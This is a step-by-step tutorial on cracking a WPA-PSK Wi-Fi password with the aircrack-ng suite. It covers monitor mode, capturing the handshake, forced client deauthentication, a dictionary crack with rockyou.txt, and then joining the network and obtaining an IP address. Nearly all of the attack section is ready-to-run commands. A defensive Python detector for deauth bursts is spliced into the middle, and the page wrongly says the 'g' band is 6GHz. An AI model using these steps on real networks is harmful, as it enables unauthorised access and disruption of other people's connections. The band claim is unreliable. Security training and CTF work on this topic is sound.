
WPA-PSK Networks

Capturing WPA1 Handshake and Cracking the Password

In this section, we'll walk through the steps to capture a WPA1 4-way handshake and crack the password using a dictionary attack. The attack involves starting the wireless interface in monitor mode, gathering target network information, de-authenticating clients, and using tools like aircrack-ng to perform the crack.

Prerequisites

Ensure you have the following:

  • A wireless card that supports monitor mode.

  • The necessary tools: airmon-ng, airodump-ng, aireplay-ng, aircrack-ng, and a wordlist (e.g., /usr/share/wordlists/rockyou.txt).

Step-by-Step Process

1. Start Interface in Monitor Mode and Kill Unwanted Services

Start by killing any processes that might interfere with your network scanning and then put your wireless interface into monitor mode:

airmon-ng check kill && airmon-ng start wlan0

  • airmon-ng check kill: Stops processes that could disrupt wireless scanning.

  • airmon-ng start wlan0: Puts your wireless interface (replace wlan0 with the correct interface name) into monitor mode (wlan0mon).

2. Gather Information About the Target Network

Next, scan for nearby wireless networks and gather information like the channel and BSSID of the target:

airodump-ng --band abg wlan0mon

  • airodump-ng: Scans for nearby networks.

  • --band abg: Scans for networks on the 2.4GHz (b), 5GHz (a), and 6GHz (g) bands.

  • wlan0mon: Your interface in monitor mode.

This command will display a list of available networks. Identify the target network and note the Channel and BSSID.

3. Capture the Handshake

To capture the WPA1 4-way handshake, specify the BSSID and channel of the target network:

airodump-ng wlan0mon --bssid <bssid> -c <channel> -w WPA1

  • Replace <bssid> with the BSSID of the target network.

  • Replace <channel> with the channel number of the target network.

  • -w WPA1: Sets the output file prefix for the captured data; the capture is written to WPA1-01.cap.

Keep this terminal running as it continuously monitors for the handshake.

4. Perform De-Authentication to Capture the Handshake

In another terminal, de-authenticate clients connected to the target network to force them to re-authenticate, which will trigger the 4-way handshake:

aireplay-ng -0 5 -a <bssid> wlan0mon

This should cause a connected client to disconnect and reconnect, providing the necessary handshake data.

  • -0 5: Sends 5 de-authentication packets.

  • -a <bssid>: Specifies the BSSID of the target network.

  • wlan0mon: The interface in monitor mode.

5. Crack the Handshake Using aircrack-ng

Once the handshake has been captured, you can use aircrack-ng to attempt to crack the password by performing a dictionary attack with a wordlist like rockyou.txt:

aircrack-ng -w /usr/share/wordlists/rockyou.txt WPA1-01.cap

  • -w /usr/share/wordlists/rockyou.txt: Specifies the wordlist to use.

  • WPA1-01.cap: The captured handshake file.

If the password is found in the wordlist, aircrack-ng will display it.

6. Connect to the Network

Once you've successfully cracked the password, you can connect to the target network using wpa_supplicant. Create a wpa.conf file with the network details:

network={
  ssid="TargetNetworkName"
  psk="CrackedPassword"
}

Then, connect with:

# wlan0 must be back in managed mode (airmon-ng stop wlan0mon) before wpa_supplicant can use it
wpa_supplicant -B -i wlan0 -c wpa.conf

7. Obtain an IP Address

Next, request an IP address from the DHCP server:

sudo dhclient -v wlan0
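As an added defensive counterpart to the procedure above (example code written for this page, not part of the original or of the aircrack-ng suite): a small Python detector that parses raw 802.11 headers and flags the pattern steps 3 and 4 produce, a burst of deauthentication frames followed by EAPOL handshake frames for the same BSSID. The sample frames are constructed inline, and names such as detect_handshake_forcing and the MAC addresses are assumptions of this example.

```python
import struct
from collections import defaultdict

# 802.11 MAC header: FC(2, little-endian) | duration(2) | addr1 | addr2 | addr3 | seq ctl(2)
HDR = struct.Struct("<HH6s6s6sH")
MGMT, DATA, DEAUTH_SUBTYPE = 0, 2, 12
LLC_SNAP_EAPOL = bytes.fromhex("aaaa03000000888e")  # LLC/SNAP header + EtherType 0x888E

def parse_frame(frame):
    """Decode the fixed header. addr3 is the BSSID for management frames and for
    data frames with neither ToDS nor FromDS set, which is what the samples use."""
    fc, _dur, a1, a2, a3, _seq = HDR.unpack_from(frame)
    return {"type": (fc >> 2) & 0x3, "subtype": (fc >> 4) & 0xF,
            "dst": a1, "src": a2, "bssid": a3, "body": frame[HDR.size:]}

def detect_handshake_forcing(frames, threshold=5, window=10.0):
    """frames: iterable of (timestamp, raw 802.11 bytes). One alert per BSSID with
    >= threshold deauths inside `window` seconds; notes whether EAPOL-Key followed."""
    deauths, eapols = defaultdict(list), defaultdict(list)
    for ts, raw in frames:
        p = parse_frame(raw)
        if p["type"] == MGMT and p["subtype"] == DEAUTH_SUBTYPE:
            deauths[p["bssid"]].append(ts)
        elif p["type"] == DATA and p["body"].startswith(LLC_SNAP_EAPOL):
            eapols[p["bssid"]].append(ts)   # 4-way handshake frames are unencrypted data frames
    alerts = []
    for bssid, times in deauths.items():
        times.sort()
        for i in range(len(times) - threshold + 1):
            start = times[i]
            if times[i + threshold - 1] - start <= window:
                followed = any(start <= t <= start + window for t in eapols[bssid])
                alerts.append({"bssid": bssid.hex(":"), "deauths": len(times),
                               "first_seen": start, "handshake_followed": followed})
                break
    return alerts

# Constructed sample frames (not from a real capture): one beacon, five deauths sent
# with the AP's address as sender (what a "-0 5" run injects), then both EAPOL directions.
def build_frame(fc, addr1, addr2, addr3, body=b""):
    return HDR.pack(fc, 0, addr1, addr2, addr3, 0) + body

AP, STA, BCAST = bytes.fromhex("aabbccddeeff"), bytes.fromhex("112233445566"), b"\xff" * 6
BEACON_FC, DEAUTH_FC, DATA_FC = 8 << 4, DEAUTH_SUBTYPE << 4, DATA << 2   # 0x80, 0xC0, 0x08
SAMPLE = [(0.0, build_frame(BEACON_FC, BCAST, AP, AP, b"\x00" * 12))]
SAMPLE += [(1.0 + 0.1 * i, build_frame(DEAUTH_FC, BCAST, AP, AP, struct.pack("<H", 7)))
           for i in range(5)]          # reason 7: class 3 frame from non-associated STA
SAMPLE += [(2.0, build_frame(DATA_FC, STA, AP, AP, LLC_SNAP_EAPOL + b"\x02\x03\x00\x5f")),
           (2.1, build_frame(DATA_FC, AP, STA, AP, LLC_SNAP_EAPOL + b"\x02\x03\x00\x75"))]
```

Feeding real frames requires a monitor-mode capture with the radiotap header stripped; a burst alert with handshake_followed set to True is the signature of exactly the sequence this page describes.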

Summary

By following these steps, you've captured a WPA1 4-way handshake, cracked the password using a dictionary attack, and connected to the network. This method is typically used in CTF challenges to simulate wireless network penetration and test WPA1 security.
